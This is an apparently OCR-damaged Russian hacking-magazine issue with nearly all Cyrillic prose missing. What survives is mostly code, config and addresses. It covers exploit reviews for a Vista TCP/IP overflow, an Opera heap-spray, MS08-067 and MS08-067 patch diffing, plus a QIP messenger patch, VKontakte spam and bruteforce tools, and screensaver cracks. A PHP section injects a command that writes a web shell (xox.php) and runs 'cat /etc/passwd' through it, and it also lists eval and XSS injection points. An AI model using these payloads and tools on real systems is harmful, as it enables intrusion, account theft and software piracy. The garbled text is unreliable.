: http- SMtp-: HoSproxy HTTP over SMTP Proxy. : HoStunnel HoSproxy. Windows. - HoStunnel , 25 (TCP SMTP). : - ( ), . HTTP- . HoSproxy , HTTP-proxy (tcp 8080), -. HTTP- . , :1. HoSproxy edge-security.com/hosproxy.php ( DVD).2. Hospoxy.cfg :

# SMTP- :

#smtp.myserver.com

local_smtp_server=

# (Y/N)

smtp-auth=N

[email protected]

smtp-pass=

#

(pop, imap, #imapssl, popssl)

mail_retrieve_protocol=pop

#

#pop3.myserver.com

mail_access_server=

#

[email protected]

#

mas_passwd=

#, WEB-

[email protected]

# HTTP-

[email protected]

3. hosproxy.exe .

7

Hostunnel

WindoWs ,

, , .

RPC dCoM,

MsBlast. , , ,

GiMMiv! KeRnelBot.dG, -

. !

>>

044 x 01 /121/ 09

Ms WindoWs

>> Brief 2008 Thomas Unterleitner phion AG (Marius Wachtler, Michael Burgbacher, Carson Hounshell Michael Craggs) TCP/IP- . Microsoft VISTA TCP/IP stack buffer overflow, . , TCP/IP- . , ExAllocatePoolWithTag, 32 - ( API- CreateIpForwardEntry2, iphlpapi.dll, 32-, 64- Windows Vista). MSDN, MIB_IPFORWARD_ROW2, PrefixLength 32 ( ). , PrefixLength DWORD, memcpy. - . , shell-. CreateIpForwardEntry2 - , , , , -, ( , ). 64- Windows , . , Service Pack 1! 64- XP , -

MIB_IPFORWARD_ROW2. PrefixLength , Server 2003. , , ... , , . , ,

, . , . - securityfocus.com/archive/1/498471.. >> TargetsVista Home/Business/Enterprise/Ultimate x32/x64 SP0/SP1 >> Exploit exploit, - , Thomasa Unterleitnera securityfocus.com/data/vulnerabilities/exploits/32357.c. . IP- ! - . IP- .

explOIt, MIB_IPFORWARD_ROW2 route;

route.InterfaceIndex = atoi(argv[1]);

route.DestinationPrefix.PrefixLength = atoi(argv[2]);

route.DestinationPrefix.Prefix.Ipv4.sin_addr.s_addr =

inet_addr('1.2.3.0');

route.NextHop.Ipv4.sin_addr.s_addr =

inet_addr("11.22.33.44");

route.Protocol = MIB_IPPROTO_NETMGMT;

route.Origin = NlroManual;

route.ValidLifetime = 0xffffffff;

route.PreferredLifetime = 0xffffffff;

route.Metric = 1;

CreateIpForwardEntry2(&route);

>> SolutionMicrosoft , , . , , , . .

MS WINDOWS

>> Brief , , support#killprog.com.

!

01

02

>>

045

API- UnhookWindowsHookEx ( ) ( API- SwitchDesktop) win32k.sys, - . , API- ! . , ( ) - . , . exploit, support#killprog, , API- Sleep(0) . exploit . , (, -) . - exploit , Windows . murphy-law.net.ru securityfocus.com/bid/32206.

>> Targets: Server 2003 Standard/Enterprise/Datacenter x32/x64 Vista Home/Premium/Ultimate x32/x64. -, , .

>> Exploit exploit, , securityfocus.com/data/vulnerabilities/exploits/whk.zip Microsoft Visual C++ exe/dll ( ).

>> Solution ! , Microsoft , . - , -, ( -, ). , . Server 2003 USER32.DLL , UnhookWindowsHookEx SwitchDesktop .

OPERA

>> Brief , , . - ( ), , shell-. 2008 ( ~16,500 ) URL file. Security Focus ( securityfocus.com/bid/32323) , HTML- exploit. , - , offline, . , , - . , :).

>> Targets 9.6 9.62.

>> Exploit exploit, , milw0rm.com/exploits/7135, .

explOIt,

var i=0;

// push es, pop es

var block = unescape("%u0607%u0607");

// metasploit WinExec c:\WINDOWS\system32\calc.exe

var shellcode = unescape(%ue8fc%u4100);

while (block.length < 81920) block += block;

var memory = new Array();

for (;i Solution , - , . , .

MS WINDOWS RPC

>> Brief2 2008 ( ) 20- . , RPC. - Windows 2000 /Server 2008 - . 32-, 64-, - . Trojan-Spy:W32/Gimmiv.A/B/C, W32/Conficker.worm, Trojan:Win32/Wecorl.A/B, Trojan:Win32/ Clort.A/!exploit/dr, TrojanDownloader:Win32/VB.CQ/CJ , , . exploit , , . Microsoft , - , - ( ), ! Microsoft , ( , )., . , -: microsoft.com/technet/security/Bulletin/ms08-067.mspx securityfocus.com/bid/31874, http://blogs.technet.com/swi/ blogs.msdn.com/sdl/archive/2008/10/22/ms08-067.aspx.

>> Targets NT- : W2K Professional/ Server/Advanced/Datacenter SP0/SP1/SP2/SP3/SP4, XP Gold/Home/Professional SP0/SP1/ SP2/SP3 x86/x86-64, Vista

03

exploit

04

x 01 /121/ 09

046

>>

x 01 /121/ 09

Home/Business/ Enterprise/ Ultimate SP0/SP1 x86/x86-64, S2K3 Standard/Datacenter/Advanced/Enterprise SP0/SP1/SP2 x86/x86-64/ Itanium, S2K8 Standard/Datacenter/Advanced/Enterprise SP0 x86/x86-64/ Itanium.

>> Exploits exploit , ... , , , (W2K, XP, S2K3). S2K8 exploit , , ! , :1. MS08-067 Remote Stack Overflow Vulnerability Exploit by Polymorphours W2K, , : milw0rm.com/exploits/7104.2. MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled) W2K S2K3[SP2], , : milw0rm.com/exploits/7132.3. MS08-067 Exploit for CN by [email protected] -, XP, S2k3 . - , exploit, : milw0rm.com/sploits/2008-MS08-067.rar.4. MS08-067 Gimmiv Worm.A (- ): offensivecomputing.net/?q=ocsearch&ocq=d65df633dc2700d521ae4dff8c393bff

>> SolutionMicrosoft , - , ( microsoft.com/technet/security/Bulletin/ms08-067.mspx) , . 139 445 , -. - , , 5c 00 2e 00 2e 00 5c 00 (\..\), 2f 00 2e 00 2e 00 2f 00 (/..), 5c 00 2e 00 2e 00 2f 00 (\../) 5c 00 2e 00 2e 00 2f 00 (/..\). (kpnc.org/ftp/MS08-067.zip, 123456). RPC SRVSVC , ( ). , .

>> Disclose , /exploit. , , , ? ? -, , exploit . , Microsoft, . , - RPC , , ! , -. Microsoft , , . , , W2K S2k8. , - W2K, - Windows2000-KB958644-x86-RUS.EXE, CAB-. - ? exe HIEW, MSCF. .cab, Windows- compress.exe RAR, netapi32.

dll, . : XP , exe - , , . , . IDA-Pro - BinDiff PatchDiff, , : http://cgi.tenablesecurity.com/tenable/patchdiff.php. netapi32.dll netapi32_o.dll, IDA-Pro . , netapi32.dll (- netapi32_p.dll), , Edit\Plug-ins, PatchDiff netapi32_o.idb. , PatchDiff , 21 . , ( Graph). , - I_NetPathCanonicalize ( ). . 1. Jump to Code .

netapi32.dll 7CD1AA3E push 0 ; char

7CD1AA40 lea eax, [ebp+UncServerName]

7CD1AA46 push eax ; Dest

7CD1AA47 lea eax, [ebp+var_20]

7CD1AA4A push eax ; int

7CD1AA4B push [ebp+Buffer] ; Buffer

7CD1AA4E NetpIsRemote

netapi32.dll7CD1FB7D push 0 ; char

7CD1FB7F push 104h ; int

7CD1FB84 lea eax, [ebp+UncServerName]

Gimmiv.A, I_NetPathCanonicalize, \..\

047 x 01 /121/ 09

>>

7CD1FB8A push eax ; Dest

7CD1FB8B lea eax, [ebp+var_20]

7CD1FB8E push eax ; int

7CD1FB8F push [ebp+Buffer] ; Buffer

7CD1FB92 call NetpIsRemote

! NetpIsRemote(Buffer, int, Dest, char), NetpIsRemote(Buffer, int, Dest, char, 0x104). , 0x104 , . -, . NetpwPathCanonicalize(), sub_7CD1AB28, :

, 7CD1AB53 push [ebp+Source] ; Str

7CD1AB56 call edi ; __imp_wcslen

7CD1AB5B cmp eax, ebx

7CD1AB5D ja short loc_7CD1ABCF

7CD1AB5F push [ebp+Source] ; Source

7CD1AB68 push eax ; Dest

7CD1AB69 call ds:__imp_wcscat

7CD1AB8D lea eax, [ebp+Str]

7CD1AB93 push eax

7CD1AB94 call sub_7CD1ABD9

7CD1AB9D lea eax, [ebp+Str]

7CD1ABA3 push eax ; Str

7CD1ABA4 call edi ; __imp_wcslen

7CD1ABA6 lea eax, [eax+eax+2]

7CD1ABB4 lea eax, [ebp+Str]

7CD1ABBA push eax ; Source

7CD1ABBB push [ebp+Dest] ; Dest

7CD1ABBE call ds:__imp_wcscpy

wcslen()/wcscpy(). bug-free , , /, \ ., - \..\ - :

7CD1ABD9 sub_7CD1ABD9 proc near

; CODE XREF: sub_7CD1AB28+6C^p

7CD1ABD9

7CD1ABE0 mov edi, [esp+14h+arg_0]

7CD1ABE4 push '/'

7CD1ABE6 pop esi

7CD1ABE7 xor edx, edx

7CD1ABE9 mov ax, [edi]

7CD1ABEC push '\'

7CD1ABEE pop ebx

7CD1ABEF xor ebp, ebp

7CD1ABF1 cmp ax, bx

7CD1ABF4 mov [esp+14h+var_4], edx

7CD1ABF8 jz loc_7CD1EB17

7CD1ABFE cmp ax, si

7CD1AC01 jz loc_7CD1EB17

7CD1AC07 loc_7CD1AC07:

; CODE XREF: sub_7CD1ABD9+3F51v

7CD1AC07 test ax, ax

7CD1AC0A mov esi, edi

7CD1AC0C jz short loc_7CD1AC2B

7CD1AC0E loc_7CD1AC0E:

; CODE XREF: sub_7CD1ABD9+60vj

7CD1AC0E cmp ax, bx

7CD1AC11 jz loc_7CD273A8

7CD1AC17 cmp ax, '.'

7CD1AC1B jz loc_7CD273BB

, , - sub_7CD1ABD9() . - . exploit SRVSVC I_NetPathCanonicalize I_NetPathCompare. , . , 4B324FC8-1670-01D3-1278-5A47BF6EE188:

I_NetPathType;

I_NetPathCompare;

I_NetNameValidate;

I_NetNameCompare;

I_NetListCanonicalize;

I_NetPathCanonicalize

I_NetNameCanonicalize;

I_NetServerSetServiceBits;

I_NetServerSetServiceBitsEx;

( ) \..\ - /../, /..\, \../ ( S2k3/S2k8). , . MSDN, - SRVSVC : msdn.microsoft.com/en-us/library/cc213209.aspx. - (hsc.fr/ressources/articles/win_net_srv/msrpc_srvsvc.html) . ! . , shell- . - JMP ESP/CALL ESP (FFE4h/FFD4h), netapi32.dll, . , Windows, . , . - , Metaspoit. DEP, , API-- VirtualAlloc VirtualProtect, ( Google return2libc). exploit . . , / , shell-, - . DVD. z

MS HIEW

-

, -

, ,

, .

,

, -

- QIP.

qip

x 01 /121/ 09

>>

048

Cr@wler

/ [email protected] /

Easyhack , - QIP , MessageBoxA. , , , , QIP . , . qip.exe , . , , - OllyDbg. , , QIP . . , - QIP , . , , : - nop . , . :). , - PE- ( , , ) -, . , : 068F4BA PE-

. , . :

0048023F . 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]

00480242 . 807D FB 00 CMP BYTE PTR SS:[EBP-5],0

00480246 74 0F JE SHORT qip_modi.00480257

00480248 E8 B740F8FF CALL qip_modi.00404304

, - , . 00480246 . : . , , - CALL 00404304, ( , - Undo Selection). nop . - , , Undo Selection, . , , ? . , . , - . , - - , , !

, , - - - . , - , , - .

warning

x 01 /121/ 09

>>

, EBX ( , , ; ) 0064ED7C. , , , -. , 0068F857. , 00480248, .

00480248 jmp 0068f857

, , 0048024D . :

0068F857 CMP EBX,0064ED7C ; -

ebx ,

0068F85D JNZ 0068F864 ; -

0064ED7C, ...

0068F85F JMP 0048024D ; ...

( qip.exe)

0068F864 PUSH 0048024D ;

...

0068F869 JMP 00404304 ; ...

, , ! , : - -.

, , - . ,

, API-: . MSDN, . CreateFileW. ( , ):

hTemplateFile -,

;

Attributes ;

Mode ;

pSecurity ;

ShareMode ;

Access ;

, ,

049

x 01 /121/ 09

>>

050

FileName .

( ). WriteFile. :

BOOL WINAPI WriteFile(

__in HANDLE hFile,

__in LPCVOID lpBuffer,

__in DWORD nNumberOfBytesToWrite,

__out_opt LPDWORD lpNumberOfBytesWritten,

__inout_opt LPOVERLAPPED lpOverlapped

);

:

hFile ;

Buffer , ;

nNumberOfBytesToRead ;

lpNumberOfBytesRead

;

lpOverlapped OVERLAPPED

().

, , 0068F86E. -. ( , , EASYHACK 2008 ), , , ( [ebp-8]) :

00649A01 CALL qip.004678B4

00649A06 CMP DWORD PTR SS:[EBP-8],0

00649A0A JE SHORT 0649A2F

, , CALL-, , ( cmp je). - , :

00649A01 CALL qip_modi.004678B4

00649A06 JMP 0068F86E

00649A0B NOP

? . 0068F86E - .1. CreateFileW -. API EAX .

0068F86E > 6A 00 PUSH 0 ; /hTemplateFile = NULL

0068F870 . 68 80000000 PUSH 80 ; |Attributes = NORMAL

0068F875 . 6A 04 PUSH 4 ; |Mode = OPEN_ALWAYS

0068F877 . 6A 00 PUSH 0 ; |pSecurity = NULL

0068F879 . 6A 03 PUSH 3 ; |ShareMode = FILE_SHARE_

READ|FILE_SHARE_WRITE

0068F87B . 68 000000C0 PUSH C0000000 ; |Access =

GENERIC_READ|GENERIC_WRITE

0068F880 . 68 A7F86800 PUSH qip_modi.0068F8A7 ;

|FileName = "log.txt"

0068F885 . E8 D60E187C CALL kernel32.CreateFileW ;

\CreateFileW

2. EAX CloseHandle, .

0068F88A . 50 PUSH EAX ; /hObject

3. WriteFile . , , - API-: , . , 0068F8EB. , VirtualProtect NewProtect = PAGE_EXECUTE_READWRITE. VirtualProtect 0068F8B7 ( PUSHAD). MOV , , 0068F8EB. :

; WriteFile :

0068F88B PUSH 0 ; |/pOverlapped = NULL

0068F88D PUSH EBP ; ||pBytesWritten

0068F88E PUSH 10 ; ||nBytesToWrite = 10 (16.)

0068F890 PUSH qip_modi.0068F8EB

; ||Buffer = qip_modi.0068F8EB

0068F895 PUSH EAX ; ||hFile

0068F896 CALL kernel32.WriteFile ; |\WriteFile

; CloseHandle ,

"PUSH EAX", -

0068F88A:

0068F89B CALL CloseHandle

; ,

VirtualProtect :

0068F8A0 POPAD

; qip.exe

0068F8A1 JMP qip_modi.00649A0B

; , CreateFileW:

0068F8A6 NOP

0068F8A7 UNICODE "log.txt",0

; :

0068F8B7 PUSHAD

; VirtualProtect

:

0068F8B8 PUSH 32F7D0

; /pOldProtect = 0032F7D0

0068F8BD PUSH 40

; |NewProtect = PAGE_EXECUTE_READWRITE

0068F8BF PUSH 0FF

; |Size = FF (255.)

0068F8C4 PUSH qip_modi.0068F8EB

; |Address = qip_modi.0068F8DD

0068F8C9 CALL kernel32.VirtualProtect

; \VirtualProtect

;

, 0068F8EB:

; 4 ...:

x 01 /121/ 09

>>

051

0068F8CE MOV ECX,DWORD PTR DS:[EBP-8]

0068F8D2 MOV EDX,DWORD PTR DS:[ECX]

0068F8D4 MOV ECX,qip_modi.0068F8EB

0068F8D9 MOV DWORD PTR DS:[ECX],EDX

;... 4 :

0068F8DB MOV ECX,DWORD PTR DS:[EBP-8]

0068F8DF MOV EDX,DWORD PTR DS:[ECX+4]

0068F8E2 MOV ECX,qip_modi.0068F8EF

0068F8E7 MOV DWORD PTR DS:[ECX],EDX

;

, -:

0068F8E9 JMP SHORT qip_modi.0068F86E

. :

00649A06 JMP 0068F86E

, - VirtualProtect, - . 0068F8E9 :

00649A06 JMP 0068F8B7

! , . VirtualProtect , . WriteFile, - , . , . , , .

, ! , --, . -, , , -. -, . , . , , QIP, - - . : -, QIP, , . (, ) . - , . . ! z

QIP . :)

BBS, , . , -

, .

.

. -

. , , .

, ? - -

. - - . , . , , . : - ? ? . , , . !

? , . , , , . :1. ( , : , , , , / ). , - . .2. ( ,

x 01 /121/ 09

>>

052

Balashek

). - , . .3. ( , , , ).4. (, , ). - . , , . , ( ) . . - .

/// , www.vkontakte.ru www.odnoklassniki.ru, - -. ///- . - ( ), -. , , , . - Chaaka Vkontakte PM spamer. - , :). :

, [name]

[lastname]

Ajax

, - 777 : [name] . [lastname] .

[:] ( , , 1 ). cURL , -. , :). , Vkontakte.ru TOOLs Smapt. . - - : 1 / 70 - 50 . , - vkontakte.ru bruteforce with multi-threads C!klodoL. :1. ActivePerl .2. :

$dic = 'passl.txt'; #

$id = 111111; #id

$mail = 'mail%40mail.com'; #, @

%40

$threads = 4; #

3. .

x 01 /121/ 09

>>

053

-/ , - - - .

- - . !

info

4. good.txt . . Odnaklassniki cheker Vid0k, PHP. , ( DVD). , , - (, , , -). , . ( ). , , . . ( ). :1. ID . . http://vkontakte.ru/friend.php?id=. id= ID .2. : : http://vkontakte.ru/photos.php?act=user&id=.: http://vkontakte.ru/photos.php?id=.: http://vkontakte.ru/video.php?id=.: http://vkontakte.ru/notes.php?id=.

: http://vkontakte.ru/opinions.php?id=. , ! , , , , :http://vkontakte.ru/infested_ip_list.html. IP-, 100% ( -) DDoS vkontakte.ru. The List of 17029 Infested IP Addresses:

121.0.133.32

121.0.134.65

121.0.134.70

121.0.135.1

121.0.135.124

121.0.135.14

121.0.135.34

12.107.192.164

121.100.111.216

121.100.96.91

121.11.132.44

121.11.174.93

121.11.182.39

121.11.183.185

121.11.185.147

121.124.193.6

121.125.101.160

121.125.205.51

121.125.241.60

, , IP - :). - :

http://vkontakte.ru/test.html

http://vkontakte.ru/admin.html

http://vkontakte.ru/captcha.php

http://vkontakte.ru/index.php?=PHPB8B5F2A0-

3C92-11d3-A3A9-4C7B08C10000

, , :). . z

! - ! , - !

warning

:)

IP DDoS

Vkontakte Tools

x 01 /121/ 09

>>

054

-

, . ,

, , ,

-

.

.

, ( , ). Win-

z, !. -, 3D- . - 3D- , Win-. 3D , Windows ( , ) WinApi . , SendMessage .3D 3D-, , , . , , , . , - ( , - ..). -

, . , - . , - , MD5, RSA , ( ) . , . ( , -) . , , . user mode (OllyDbg, MS Dbg) 3D-.

, . 3D-, 3D-, , (OpenGL), (OpenGL) . : -

x 01 /121/ 09

>>

056

_a1!3N

_a1!3N

, ( , , , , , , ) -. , :

1. API-,

(glOrtho);

2. API-,

(glEnable(GL_BLEND), glBlendFunc(GL_SRC_ALPHA, GL_ONE_

MINUS_SRC_ALPHA), glColor4f...);

3. -

.

, . , - Screensaver download ! - :). , Windows , System32, *.scr , ... !

OpenGl ElectriCalm 3D Screensaver. IDA ( , , , ). . -

PE Executable (*.scr *.exe). , , Imports. gl_ , OpenGL. glOrtho. DATA XREF: , glOrtho. .

.data:0043A2CC glOrtho dd ? ; DATA XREF: sub_405350+44

, ( IDA sub_405350) 0x405350. ? - glOrtho, , N Rename Call_Ortho. CODE XREF: , , , , Call_Ortho.

; CODE XREF: sub_403C10+E02

; sub_405110+2A

(sub_403C10+E02) - :

004049DC push 0BE2h ;.

004049E1 call glEnable ;glEnable(GL_BLEND);

x 01 /121/ 09

>>

057

004049E7 push 303h

004049EC push 302h ;. . (-

)

004049F1 call glBlendFunc ;glBlendFunc(GL_SRC_

ALPHA, GL_ONE_MINUS_SRC_ALPHA);

004049F7 mov ebx, [ebp-34h]

004049FA push ebx ; (-

)

004049FB push 0

004049FD push 0

004049FF push 0 ;.

. ALPHA

00404A01 call glColor4f ;glColor4f(RED,GREEN,BLUE

,ALPHA)

00404A07 push 0DE1h ;.

00404A0C call glDisable ;glDisable(GL_TEXTURE_2D)

00404A12 call Call_Ortho ;glOrtho... . .

00404A17 push 7 ;

00404A19 call glBegin ;glBegin(GL_QUADS)

, . , , , . - (glDisable(GL_TEXTURE_2D)) , . push 7 0x00404A17 push 0, glBegin(GL_POINTS). OpenGL , . glBegin . OpenGL, . OllyDbg, - Hiew. Hiew ElectriCalm 3D Screensaver.scr , . 0x00404A17, , , PE-, . . (6A 07) - push 7. , 6A 00. . (, , OpenGL , ), - . ,

! -, , -. sub_405110 ( PrintStringLine), - , . , Call_Ortho, , , . ( , , , , ..). . . , ( NOP 0x90, push...) - (glBegin, glVertex). glVertex3f x, y, z. - (, 0), 3D-: - . : glColor4f --, 0.0 1.0 :

004049F7 mov ebx, [ebp-34h] ; -

[ebp-34h] EBX

004049F7 xor ebx, ebx ;

EBX (EBX = 0) = 0

NOP. - -, -. ASSEMBLER, OllyDbg. :1. OllyDbg, ElectriCalm 3D Screensaver.scr.2. 004049F7.3. , xor ebx, ebx. (OllyDbg NOP ).4. Copy to executable All modifications.5. Copy all.6. Save file c- . 3D Formula 1 Screensaver. . glOrtho, , CallOrtho - , . Color4f Vertex3f. , . , . : , , . , OpenGL,

x 01 /121/ 09

>>

058

OpenGL-

Hiew

(RenderFunc IDA) API- SwapBuffers glutSwapBuffers, -- glut, - Windows - . SwapBuffers, . - , , ( , ). SwapBuffers :

extrn SwapBuffers:dword

; DATA XREF: sub_406320+281

; sub_417379+6FC

, . - :

00417A3F test ecx, ecx

00417A41 jnz short loc_417A54

; >

059

- - (, - - - , , - , NOP 0x90...):1. . - Windows 95.2. . . -.3. ., ., . OpenGL. -.

info

3D-

00403C44 call sub_401390

00403C49 mov eax, ds:dword_4A0854

00403C4E mov ecx, [eax]

00403C50 push eax

00403C51 call dword ptr [ecx+18h]

00403C54 mov edx, ds:dword_4A085C

00403C5A imul edx, 4CCh

00403C60 mov eax, ds:dword_49ACD4[edx]

00403C66 test eax, eax

00403C68 mov eax, ds:dword_4A0844

00403C6D jnz short loc_403C8B ;(3)

00403C6F mov ecx, [eax]

sub_401110, 0x00403C3D, -, API- (ExtTextOut, SetTextColor...), , UNREGISTERED VERSION!, Press the space bar to find out. -? , . sub_401390 0x00403C44. Remaining time: %u sec.. -, . - , , Jnz (1) ; : 75 EB. Atlantis 3D Screensaver. , ( 0x0042414F). , -

( WinAPI) On_Idle ( 0x004241B3). RenderFunc. ... :

0042839A call dword ptr [eax+4Ch]

? , EAX. :

00428392 mov edx, [ebp+var_C] ; EDX -

var_C=ebp-0Ch

00428395 mov eax, [edx] ; EAX -

var_C, On_Idle:

004281CC mov [ebp+var_C], ecx ; -

[ebp+var_C] On_Idle

, ECX, -

, ..

, ECX.

004241AD mov ecx, [ebp+var_4C8] ; ECX

? :

00423EA4 mov [ebp+var_4C8], ecx ; -

[ebp+var_4C8] sub_423E9B

ECX (sub_423E9B) . , :

x 01 /121/ 09

>>

060

DirectX

0044C395 mov ecx, offset unk_56EF30 ; ECX

unk_56EF30

! , - , ASSEMBLER. , ECX , this ++, , , ( = (this+4Ch)). , , , ? this=unk_56EF30 . , . OllyDbg, , 0x0056EF30 ( , Go to Expression, 0056EF30) 0x18744900. Intel ( ), 0x00497418, 0x00497418 + 0x4C = 0x00497464, , , 0x00454a87 . IDA: sub_454A87 , , . , , NOP. , . . Call. -- , -, . ( ), , ! (0x00454B0C) (0x00454B08), . -, , , FPS. - , . ! sub_428670 , 3 . . : -, , . - . , , , , ( ). IDA . -, . , , -, . , .

00429712 jz loc_429A91

, . :

004292C3 jz loc_429680

! Christmas Time 3D Screensaver . , On_iDle RenderFunc . . , , , , - . IDA, On_Idle. , 0x0041295F. , - , . , On_Idle inline-, - . , On_Idle , - RenderFunc. RenderFunc : Jcc 0x00413344. , , . 0x004132DC, 0x004132EE. , . Jcc 0x00413282, ! , - RenderFunc. . sub_406C07 , , RenderFunc. sub_4091FA, 50 , , Bliss, Lamp_off01.tga... - , 0x0040AA18.

?, , (- ) 3- -. , , - ( , ) , , , ASProtect. stripper. - 3D- , - , - . : . , 3D-. z

x 01 /121/ 09

>>

061

IDA !

PHP-

WordPress, Joomla, Drupal, Moodle , , -

CMS, PHP. , -

-: kses, Snoopy SpellChecker

TinyMCE?

,

: XSS code exec. -

,

CMS.

x 01 /121/ 09

>>

062

/ icq 884888, http://wap-chat.ru /

code exec WYSIWYG- TinyMCE. TinyMCE , , , WordPress 2.0.x-2.7.x ./wp-includes/js/tinymce/plugins/spellchecker. : - Google, PHP- PSpell, win- nix- aspell. config.php :

, , TinyMCE. , - $config[general.engine] = PSpellShell; . . RPC- ( 3 TinyMCE 2.5 - WordPress, POST GET-). lang ./wp-includes/js/tinymce/plugins/spellchecker/classes/

PSpellShell.php:

function _getCMD($lang) {

$this->_tmpfile = tempnam(

$this->_config['PSpellShell.tmp'], "tinyspell");

if(preg_match("#win#i", php_uname()))

return $this->_config['PSpellShell.aspell'] .

" -a --lang=". $lang . " --encoding=utf-8 -H < "

. $this->_tmpfile . " 2>&1";

x 01 /121/ 09

>>

063

return "cat ". $this->_tmpfile ." | " . $this->_

config['PSpellShell.aspell']

. " -a --encoding=utf-8 -H --lang=". $lang;

}

evil- JSON-. POST-, rpc.php, :

{"method":"getSuggestions","params":["en; _EVIL_-

"]}

, , :). .

, - , Snoopy PHP-, -. , , . (http://google.com/codesearch), - WordPress, TikiWiki, Xoops , , . _httpsrequest():

function _httpsrequest($url,$URI,$http_method,

$content_type="",$body="")

{

...

$safer_URI = strtr( $URI, "\"", " " ); // strip

quotes from the URI to avoid shell access

exec($this->curl_path." -D \$headerfile\

"".$cmdline_params." \"".$safer_URI.""\

"",$results,$return);

...

}

WordPress escapeshellcmd. , ?1. evil- $URI, - ;2. evil- exec. , , , , - ? ! backticks ( ). - :

echo "'id'"

'id', -

id. , - XOOPS.

, xoops-1.3.10 ( ) :1. ./html/class/snoopy.class.php, - _httpsrequest() fetch();2. ./class/phpsyndication.lib.php :

require(XOOPS_ROOT_PATH."/class/snoopy.class.php");

...

function getData($forcecache=false)

{

...

$snoopy = new Snoopy;

...

$snoopy->fetch($this->sourceUrl);

$data = $snoopy->results;

...

}

function getHtml($fromcache=false)

{

$data = $this->getData($fromcache);

...

function getTitle($fromcache=false)

{

$data = $this->getData($fromcache=false);

getTitle() getHtml();3. ./html/modules/headlines/blocks/headlines.php :

>>

064

wiki.moxiecode.com/index.php/TinyMCE:Plugins/spellchecker wiki SpellChecker - TinyMCE.

securityfocus.com/bid/31887 Snoopy advisory.

snoopy.sourceforge.net Snoopy.

www.securityfocus.com/archive/1/414573 Advisory Xoops, Snoopy.

xoops.ru - Xoops.

links

x 01 /121/ 09

, getTitle() getHtml(). :1. headlinesurl https://'echo '' >> xox.php'

( headlines; , );2. XOOPS headlines URL;3. , http://victim.com/xoops-1.3.10/html/class/

xox.php?cmd='cat /etc/passwd'. , Snoopy , , , - . .

- kses (PHP- ).Kses , WordPress, Moodle, Drupal, eGroupware, Dokeos, PHP-Nuke, Geeklog . code exec preg_replace /e:

function kses_bad_protocol_once($string,

$allowed_protocols){

return preg_replace('/^((&[^;]*;|[\sA-Za-z0-

9])*)'.

'(:|:|[Xx]3[Aa];)\s*/e', 'kses_bad_

protocol_once2("\\1", $allowed_protocols)',

$string);

}

(, phpinfo) kses_bad_protocol_once() - :

H4ck

, WordPress , , , wp_kses_normalize_entities() : & &

$string = str_replace('&', '&', $string);

WordPress , . - , . - , . , , Moodle. . :

$injection_points = array(

'blocks/rss_client/block_rss_client_error.

php' => array('error'),

'course/scales.php?id=1' => array('name',

'description'),

'help.php => array('text'),

'login/confirm.php' => array('data', 's'),

'mod/chat/gui_basic/index.php?id=1' =>

array('message'),

SpellChecker TinyMCE

>>

'mod/forum/post.php' => array('name'),

'mod/glossary/approve.php?id=1' => array('hook'),

'mod/wiki/admin.php' => array('page'),

- :

$value = '';

eval() :). code exec , XSS. - phpMyFaq , XSS kses . .

xSS kses javascript kses_bad_protocol_once2(). urldecode() %0B ( ) %08 ( ). PoC ( ):

(Opera) lol

(Firefox) test

! kses style, kses XSS, CSS. :

(Firefox) test

. , , advisory , . z

Snoopy XSS WordPress kses

WP kses

065 x 01 /121/ 09

PE--

, Win32

. , -

, . ,

, / -

IDA Pro.

, , - Potable Executable (, , PE).

. , , (, ). , . ntoskrnl.exe, /-/. , , Windows ( wine) , , . ( ) crackme (kpnc.org/ftp/KedaH3.zip), (IDA Pro, OllyDbg, HIEW, etc). , - .

PE- , (raw) . , : , . (physical) (virtual). , , , PE-, - . ( ) , - , , / . , , (Virtual Size Physical Size) . , - , PE-. , 10h , 100h, / 1000h. , , 10h . -

x 01 /121/ 09

>>

066

( , , PE- ). , , 10h , ... ? - , . . , 10h . -, . , . , IDA Pro ( 5.3 ), HIEW, DUMPBIN .

, , . . ( ), . . , , , , . , - . , ( W2K, S2K3 XP), - .no pain no gain. : condom-principle: itd rather have one and not need it that need it and not have one., condom , . , crack-me MessageBoxA. HIEW , ; , HEX-mode () (Header), (Entry). ... ! , . , . , 401010h, 10h

.text, , .! HIEW ! - . : The input file contains non-empty TLS (Thread Local Storage) callback table. However, IDA Pro couldnt find the TLS callback procedures in the loaded code - TLS callback, IDA Pro TLS callback . , , - .

KedaH3.exe ida Pro - Retn, .text:00401000 _text segment para public 'CODE' use32

.text:00401000 assume cs:_text

.text:00401000 ;org 401000h

.text:00401000 assume es:nothing, ss:nothing, ds:_data,

fs:nothing, gs:nothing

.text:00401000 retn

.text:00401000

.text:00401001 dd 3 dup(?)

.text:0040100D db 3 dup(?)

.text:00401010 public start

.text:00401010 start dd 8 dup(?)

.text:00401010 _text ends

, , RET, , - . MessageBoxA? ? ! TLS Callback , , , . KedaH3.exe , ... . , , , - , 100% . . ( , ), , , , .

x 01 /121/ 09

>>

067

KedaH3.exe 100%

HIEW

, IDA Pro KedaH3.exe

KedaH3.exe, ,

, KedaH3.exe ( ) , , Windows.

HIEW. , - HEX- . / , / HEX-. . ( , ?) , . , ( 401000h) - . - , (RETN) , HIEW . . , HIEW , , , . - crack-me HIEW . HIEW , ., , . , . , ENTER, Manual Load, Load File of New Format, . - , ! IDA Pro 5.2 -, 5.3, , , .

KedaH3.exe, ida Pro 5.3 00401010 public start

00401010 start proc near

00401010 dec eax

00401011 retn

00401011 start endp

00401011

00401012 loc_401012:

; CODE XREF: .text:00401049vj

00401012 push offset a_noPainNoGain_

; " .no pain no gain. "

00401017 push offset unk_403018

0040101C push 0

0040101E call ds:MessageBoxA

00401024 xor eax, eax

00401026 mov eax, [eax]

00401028 db 65h

00401028 jp short near ptr dword_4010A0

0040102B insd

00401030

00401030 public TlsCallback_0

00401030 TlsCallback_0:

; CODE XREF: .text:0040103Bvj

00401030 mov esi, esp

00401032 lodsd

00401033 lodsd

00401034 mov al, 10h

00401036 mov ah, al

00401038 xchg eax, esi

00401039 lodsb

0040103A dec eax

0040103B jnp short TlsCallback_0

0040103D xor eax, eax

0040103F push eax

00401040 mov al, 30h

00401042 mov esi, fs:[eax]

00401045 inc esi

00401046 dec byte ptr [esi+1]

00401049 jnp short loc_401012

0040104B xor eax, eax

0040104D mov eax, [eax]

0040104D

0040104D ; -------------------------------------------

00403000 a_noPainNoGain_ db ' .no pain no gain. ', 0

; DATA XREF: loc_401012^o

00403018 aCondomPrincipl db 0Ah

; DATA XREF: .text:00401017^o

